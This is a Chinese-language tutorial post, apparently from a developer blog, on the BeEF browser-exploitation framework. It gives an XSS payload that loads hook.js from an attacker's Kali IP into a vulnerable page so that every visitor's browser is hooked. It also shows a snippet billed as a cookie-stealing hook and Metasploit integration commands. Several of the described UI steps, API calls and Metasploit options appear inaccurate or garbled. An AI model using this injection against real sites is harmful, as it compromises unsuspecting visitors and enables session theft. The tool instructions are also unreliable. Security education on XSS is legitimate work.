XSS利器之BeEF

简介: XSS利器之BeEF

image.png

image.png

我们输入默认的用户名和密码:beef,即可登录BEEF。

BEEF渗头测试实战

接下来,我们使用BEEF进行渗头测试的实战。

BEEF把其公鸡脚本全部放在了hook.js的脚本中,因此我们需要在页面中将该文件当作JavaScript脚本代码来执行。一个常见的作法是利用某页面的XSS漏懂,这样我们就可以将下列代码:

<script src="http://192.168.136.66:3000/hook.js"></script>

1.

插入到页面中。其中192.168.136.66为Kali Linux的IP地址。这样,所有访问该页面的用户,都会加载BEEF的公鸡脚本,然后就会收到BEEF的公鸡了。

我们按照上述思路构造页面,然后让浏览器访问该页面,我们就可以在BEEF的管理页面中看到上线的浏览器信息了,如下所示:

image.png

image.png

基本使用步骤

安装 BeEF:

克隆 BeEF 的 GitHub 仓库:

git clone https://github.com/beefproject/beef.git


安装依赖:

cd beef  
gem install bundler  
bundle install


启动 BeEF:

启动 BeEF 服务器:

ruby app.rb


打开浏览器,访问 http://localhost:3000/,你会看到 BeEF 的管理界面。

配置代理:

配置你的浏览器使用 BeEF 作为代理服务器。例如,在 Chrome 中,打开设置,搜索“代理”,然后配置代理服务器为 http://localhost:3000/。

捕获流量:

在 BeEF 界面中,点击“Hooks”标签,然后点击“Add Hook”按钮。选择一个钩子(例如,alert("BeEFed!")),然后点击“Inject”按钮。

浏览器会自动加载一个 JavaScript 代码片段,当你访问任何网站时,BeEF 会注入这个钩子。

查看结果:

当钩子被触发时,BeEF 界面会显示相关信息,包括访问者的 IP 地址、浏览器信息等。

进阶使用方法

编写自定义钩子:

你可以编写自己的 JavaScript 代码来创建自定义钩子。例如,你可以创建一个钩子来窃取用户的 cookie:

var cookies = document.cookie;
alert(cookies);


将这个代码片段添加到 BeEF 的“Hooks”标签中,然后注入到目标网站。

使用 BeEF 模块:

BeEF 提供了许多内置模块,可以帮助你执行各种公鸡和测试。例如,你可以使用“XSS”模块来测试跨站脚本公鸡。

在 BeEF 界面中,点击“Modules”标签,然后选择一个模块进行测试。

集成 BeEF 和 Metasploit:

BeEF 可以与 Metasploit 框架集成,从而实现更复杂的公鸡。例如,你可以使用 BeEF 来传递 Metasploit 的有效载荷。

配置 Metasploit 以使用 BeEF 作为代理:

msfconsole  
use auxiliary/server/beef  
set LHOST <your_local_ip>
set PORT 3000  
set HandlerPort 8080  
run


在 BeEF 界面中,点击“Hooks”标签,然后点击“Add Hook”按钮。选择一个钩子(例如,alert("BeEFed!")),然后点击“Inject”按钮。

自动化测试:

你可以使用 BeEF 的 API 来自动化测试过程。例如,你可以编写一个脚本来自动注入钩子并收集结果。

使用 BeEF 的 RESTful API,你可以通过 HTTP 请求来控制 BeEF 服务器。例如,你可以使用 curl 命令来添加一个钩子:

curl -X POST http://localhost:3000/hooks -d "url=http://example.com" -d "hook=alert('BeEFed!')"


相关文章
|
2月前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
2月前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
1月前
|
JavaScript 安全 前端开发
同源策略如何防止 XSS 攻击?
【10月更文挑战第31天】同源策略通过对 DOM 访问、Cookie 访问、脚本执行环境和跨源网络请求等多方面的严格限制,构建了一道坚实的安全防线,有效地防止了 XSS 攻击,保护了用户在网络浏览过程中的数据安全和隐私。
99 49
|
5月前
|
存储 安全 JavaScript
手摸手带你进行XSS攻击与防御
当谈到网络安全和信息安全时,跨站脚本攻击(XSS)是一个不可忽视的威胁。现在大家使用邮箱进行用户认证比较多,如果黑客利用XSS攻陷了用户的邮箱,拿到了cookie那么就可以冒充你进行收发邮件,那真就太可怕了,通过邮箱验证进行其他各种网站的登录与高危操作。 那么今天,本文将带大家深入了解XSS攻击与对应的防御措施。
|
1月前
|
安全 前端开发 Java
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第26天】Web安全是现代软件开发的重要领域,本文深入探讨了XSS和CSRF两种常见攻击的原理及防御策略。针对XSS,介绍了输入验证与转义、使用CSP、WAF、HTTP-only Cookie和代码审查等方法。对于CSRF,提出了启用CSRF保护、设置CSRF Token、使用HTTPS、二次验证和用户教育等措施。通过这些策略,开发者可以构建更安全的Web应用。
87 4
|
1月前
|
安全 Go PHP
Web安全进阶:XSS与CSRF攻击防御策略深度解析
【10月更文挑战第27天】本文深入解析了Web安全中的XSS和CSRF攻击防御策略。针对XSS,介绍了输入验证与净化、内容安全策略(CSP)和HTTP头部安全配置;针对CSRF,提出了使用CSRF令牌、验证HTTP请求头、限制同源策略和双重提交Cookie等方法,帮助开发者有效保护网站和用户数据安全。
70 2
|
1月前
|
存储 安全 Go
Web安全基础:防范XSS与CSRF攻击的方法
【10月更文挑战第25天】Web安全是互联网应用开发中的重要环节。本文通过具体案例分析了跨站脚本攻击(XSS)和跨站请求伪造(CSRF)的原理及防范方法,包括服务器端数据过滤、使用Content Security Policy (CSP)、添加CSRF令牌等措施,帮助开发者构建更安全的Web应用。
92 3
|
1月前
|
SQL 存储 安全
什么是XSS攻击?什么是SQL注入攻击?什么是CSRF攻击?
理解并防范XSS、SQL注入和CSRF攻击是Web应用安全的基础。通过采用严格的输入验证、使用安全编码实践以及实现适当的身份验证和授权机制,可以有效防止这些常见的Web攻击,保障应用程序和用户的数据安全。
40 0
|
3月前
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
554 1
|
2月前
|
存储 JavaScript 安全